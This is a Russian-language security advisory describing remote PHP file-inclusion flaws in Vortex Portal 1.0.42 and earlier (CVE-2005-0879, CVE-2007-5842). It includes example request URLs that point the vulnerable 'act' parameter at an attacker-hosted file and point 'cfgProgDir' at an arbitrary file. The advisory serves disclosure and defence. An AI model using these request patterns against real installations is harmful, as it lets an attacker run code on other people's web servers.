Security Lab

PHP-инклюдинг в Vortex Portal

Дата публикации:28.03.2005
Дата изменения:08.11.2007
Всего просмотров:6619
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: CVE-2005-0879
CVE-2007-5842
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Vortex Portal 1.x
Уязвимые версии: Vortex Portal 1.0.42 и более ранние версии

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю скомпрометировать целевую систему.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "act" в сценариях content.php и index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[target]/index.php?act=http://[attacker]/file
http://[target]/content.php?act=http://[attacker]/file

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "cfgProgDir" в сценариях admincp/auth/secure.php и admincp/auth/checklogin.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:
http://[host]/admincp/auth/secure.php?cfgProgDir=[file]
http://[host]/admincp/auth/checklogin.php?cfgProgDir=[file]

URL производителя: www.vortexportal.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Журнал изменений:

08.11.2007
Обновлено описание. Добавлена уязвимость #2.

Ссылки: Vortex Portal Lets Remote Users Include and Execute Arbitrary PHP Code